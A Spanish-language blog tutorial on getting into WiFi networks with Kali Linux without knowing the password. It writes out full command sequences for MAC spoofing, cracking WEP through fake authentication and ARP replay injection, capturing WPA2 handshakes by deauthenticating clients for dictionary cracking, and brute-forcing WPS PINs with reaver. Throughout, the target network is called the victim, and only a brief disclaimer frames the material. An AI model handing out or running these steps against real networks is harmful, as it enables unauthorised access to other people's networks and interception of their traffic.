Recuperar clave WiFi con Kali Linux

En la presente publicación les mostraremos algunos ejemplos de como recuperar la contraseña del WiFi sin necesidad de contar con un indicio de esta. Los métodos varían según la encriptación de la red y no es siempre igual de fácil con todos los modelos de router en el mercado, ya que algunos cuentan con protección tras una cierta cantidad de intentos u otras técnicas para mayor seguridad. ¡Favor no usarlos para colgarse del vecino, ya que eso constituye un delito!

Ataque de fuerza bruta (Eficaz contra WEP):

  1. Lo primero es que abramos una terminal (presionamos Ctrl+Alt+T) y tecleamos “ifconfig” para saber que interfaces tenemos, y la dirección “MAC” de estas. Luego, para conocer la interfaz inalámbrica, escribimos “airmon-ng”.
    • La interfaz en este ejemplo será “wlan0” (puede ser también “ath0” u otra) y la MAC XX:XX:XX:XX:XX:XX (Estos dos datos deberán sustituirlos por los de su computador).
  2. Ahora deben detener la interfaz para cambiar la MAC por una más sencilla y luego activar el modo monitor. Esto se hace mediante el comando “airmon-ng stop wlan0”.
  3. Cambiamos la MAC a 00:11:22:33:44:55 con “macchanger –mac 00:11:22:33:44:55 wlan0”
  4. Y finalmente reincidamos la interfaz con el comando “airmon-ng start wlan0”, activando a la vez el modo monitor. (Dirá “monitor mode enabled on mon0” o algo similar)
  5. El siguiente paso es escanear las redes disponibles mediante el comando “airodump-ng wlan0”. Selecciona la red que tenga el “#/s” (datos por segundo) mayor. Anota el número de canal (channel), por ejemplo el 11, el nombre del router (SSID) y su MAC, y aprieta “Control + C”.
  6. A continuación probamos si podemos inyectar paquetes al router para acelerar el proceso, esto se comprueba con “aireplay-ng -9 -e [SSID] -a 00:11:22:33:44:55 wlan0”
  7. Escribe “airodump-ng -c 11 -w clavewifi wlan0”. “ARCHIVO” es el archivo de salida y “11” es el numero del canal de la victima (el canal puede no ser escrito, por si deseas capturar de todos los canales). Con esto capturamos los datos.
  8. Ahora toca inyectar tráfico para acelerar el proceso. Esto se logra mediante “aireplay-ng -1 0 -a [MAC del router] -h 00:11:22:33:44:55 wlan0” (autentificación falsa) y “aireplay-ng -3 -b [MAC router] -h 00:11:22:33:44:55 wlan0” (re-inyección de ARP) Cuando el valor de “ARP” en la ventana de airodump-ng sea mayor a 60.000, puedes obtener la clave. (esto puede tardar de un par de minutos a horas).
  9. De no funcionar la inyección, intenta ocupar este comando en una ventana distinta “aireplay-ng –fakeauth 6000 -o 1 -q 10 -e [Nombre Router] -a [MAC Router] wlan0”. Si no funciona, solo resta esperar a alcanzar una cantidad de paquetes suficiente.
  10. Cuando ya tengan suficientes, abre una nueva terminal y escribe “aircrack-ng –z clavewifi-01.cap”. Conviene hacerlo en una nueva ventana, ya que si no hay suficientes paquetes se puede seguir capturando en paralelo.
  11. Quizá nos pedirá que escribamos el numero del router respecto de una lista y nos mostrará la clave en caso de tener los paquetes necesarios. Ejemplo: “Key found 10:97:56:45:01”. Si no la consigue o empieza a probar combinaciones, detenlo con “Control + C” y vuelve a intentarlo cuando tengas algunos paquetes más.
  12. Si la red es WPA2, necesitarás un diccionario que contenga la clave y un handshake. Para obtener este último usa el comando “aireplay-ng -0 5 -a [mac víctima] -c [tu mac] wlan0”. Para usar un diccionario para averiguar la contraseña debes nombrarlo al momento de usar este comando “aircrack-ng –z -w diccionario.lst clavewifi-01.cap” (Aquí el archivo del diccionario lo llamamos “diccionario.lst”)

Reaver (Redes WPA/WPA2 con WPS activado):

Este método funcionará únicamente si el router objetivo tiene el sistema WPS (WiFi Protected Setup) activado. Aquí obtendremos el pin mediante un ataque de fuerza bruta. La gracia es que solo hay 11.000 combinaciones posibles a probar, las cuales están compuestas por un primer grupo de 4 dígitos, un segundo grupo de 3 y un dígito verificador.

Ya que algunos equipos incluyen protección contra un cierto números por intento en un periodo de tiempo, puede que el ataque tarde más en probar las combinaciones. Hay que ser pacientes.

  • Lo primero es que abramos una terminal (presionamos Ctrl+Alt+T) y tecleamos “ifconfig” para saber que interfaces tenemos, y la dirección “MAC” de estas. Luego, para conocer la interfaz inalámbrica, escribimos “airmon-ng”.
    • La interfaz en este ejemplo será “wlan0” (puede ser también “ath0” u otra) y la MAC XX:XX:XX:XX:XX:XX (Estos dos datos deberán sustituirlos por los de su computador).
  • Ahora deben detener la interfaz para cambiar la MAC por una más sencilla y luego activar el modo monitor. Esto se hace mediante el comando “airmon-ng stop wlan0”.
  • Cambiamos la MAC a 00:11:22:33:44:55 con “macchanger –mac 00:11:22:33:44:55 wlan0”
  • Y finalmente reincidamos la interfaz con el comando “airmon-ng start wlan0”, activando a la vez el modo monitor. (Dirá “monitor mode enabled on mon0” o algo similar)

  1. Ahora, revisa las redes que tienen WPS activo con “wash -i mon0”
  2. Luego de encontrar el BSSID en el que estamos interesados, escribir el siguiente comando completándolo con la mac del objetivo y tu tarjeta en modo monitor: “reaver -i mon0 -b  [MAC del router] -c 11 -vv” (Aquí estamos atacando un router en el canal 11)
  3. El tiempo de espera normal es de 4-10 horas para obtener el PIN. Puede que salte de un porcentaje bajo a uno alto rápidamente. Esto significa que encontró el primer conjunto de dígitos.

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *